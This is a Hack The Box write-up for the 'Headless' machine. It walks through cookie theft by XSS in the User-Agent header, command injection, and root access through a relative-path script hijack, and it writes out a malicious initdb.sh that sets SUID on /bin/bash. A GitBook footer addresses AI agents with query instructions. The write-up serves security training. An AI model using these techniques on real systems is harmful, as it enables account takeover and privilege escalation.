> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-headless.md).

# HTB - Headless

## Enumeration and Foothold

### NMAP

```bash
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FD2htxSke4fZ2w5Jj5JVP%2Fimage.png?alt=media&amp;token=c7646e16-1127-422c-96db-23f6e270be28" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNWoLVJQIezt4rEp2DuTh%2Fimage.png?alt=media&amp;token=071aa52a-bc3c-4555-80a0-3e7cdddb2e28" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwenbisNH6KiHxdFFmOqJ%2Fimage.png?alt=media&amp;token=110183b9-1a06-4860-8083-01b60bf8182c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTQ94FCriNdbIlXmA16DJ%2Fimage.png?alt=media&amp;token=67695a58-3614-4a18-af17-6c7718fbdf85" alt=""><figcaption></figcaption></figure>

checking for JavaScript resulted in hacking attempt detected.

Also directory enumeration revealed a /dashboard directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFCgpnWl5VZOtuwU9V4xV%2Fimage.png?alt=media&amp;token=ef94ade3-7e84-4a6e-8c3c-b2a3d85dfaf7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyHilZ1BWVSzbNTNmqnQE%2Fimage.png?alt=media&amp;token=27a2ec51-fa68-49d1-ae73-f4038ff2d5cf" alt=""><figcaption></figcaption></figure>

accessing it gives error says required credentials

### Cross Site Scripting Bypass Filter

That said i need to bypass the restriction on support form and get admin cookie without being flagged.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJLdiAsLmGLWTzdHA0pT7%2Fimage.png?alt=media&amp;token=77d4db63-a4ce-4434-9909-6c6ea15077e9" alt=""><figcaption></figcaption></figure>

The user agent is also reflected i can try XSS through it

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbYCJmP8A0HwZdU6XgBOZ%2Fimage.png?alt=media&amp;token=5527d680-5c6c-483d-aec2-90c82a19e8e6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ft3MKmkNYbT8nnhIsPk8n%2Fimage.png?alt=media&amp;token=f4a56102-9946-4cf9-90bc-5f185cd0b5c3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAEbuTDXAxwtoMX5N4ZRq%2Fimage.png?alt=media&amp;token=243df617-8f2c-4993-a378-75e4ec7f1eac" alt=""><figcaption></figcaption></figure>

XSS confirmed that said i can use the vulnerability to extract the admin session cookie.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4vYMv8f127jrfJgiI613%2Fimage.png?alt=media&amp;token=30ebd15f-8847-4923-a492-df5c01ec7ed1" alt=""><figcaption></figcaption></figure>

request the response in browser and cookie will to sent to python server

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYUEnHObaoYTbanwmYtbs%2Fimage.png?alt=media&amp;token=7e9ce4e2-eb68-4ed4-8284-a54c1712a686" alt=""><figcaption></figcaption></figure>

Copy the cookie and update in the developer tools to access as admin.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fn6BqqgmlKTOAdlGJWeuM%2Fimage.png?alt=media&amp;token=7eca4c4b-e80a-484c-992b-8c568295e88d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9rydPFknjYUp8cYPjaIf%2Fimage.png?alt=media&amp;token=c3b2c7dc-596f-4383-8eb6-2edd8fe5987c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkyZhBUdgIshiHBIsRy6U%2Fimage.png?alt=media&amp;token=4cb221b6-8a11-4ffa-965c-654d8c8334e7" alt=""><figcaption></figcaption></figure>

### Command Injection

testing for command injection worked

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXQ42Op3S5vJTzcfKCSU5%2Fimage.png?alt=media&amp;token=6a074ccf-0f09-4848-a5df-b53df8abf796" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fv8DgrCgBGQCsdudQNBEm%2Fimage.png?alt=media&amp;token=e4629512-3051-44c0-9e2e-434aa88fd2df" alt=""><figcaption></figcaption></figure>

## Shell as DVIR

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNO18NMmCEEBLnF4mEtaU%2Fimage.png?alt=media&amp;token=34313c65-4132-4a54-8d31-40236a0029d0" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6XpSxC4r92ZV5AGUrcmU%2Fimage.png?alt=media&amp;token=301a231a-00ac-4c99-b0ac-b38ab1e7fc6b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fhq4QwiX66FQK6eHGcNvE%2Fimage.png?alt=media&amp;token=1f8f4375-659c-41e4-84f0-c92ab1d8cfcc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9MCOWdskhRiopIwH313y%2Fimage.png?alt=media&amp;token=5a2619b8-ad47-4aa8-a07c-6dce7a3335a2" alt=""><figcaption></figcaption></figure>

The script calls `./initdb.sh` without an absolute path, so it looks in whatever directory it's executed from (your `$PWD`) rather than a fixed location. Since you run it via `sudo`, that `./initdb.sh` executes as root, using your current working directory.

```
cat << 'EOF' > initdb.sh
#!/bin/bash
chmod +s /bin/bash
EOF
chmod +x initdb.sh
```

```
dvir@headless:/tmp$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 2.0G
System load average:  0.00, 0.02, 0.05
Database service is not running. Starting it...
```

## Shell  Root

```
dvir@headless:/tmp$ /bin/bash -p
/bin/bash -p
id
uid=1000(dvir) gid=1000(dvir) euid=0(root) egid=0(root) groups=0(root),100(users),1000(dvir)
cd /root
ls
root.txt
cat root.txt
73a212c638deb1b4fee6eb4e41088fce
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-headless.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
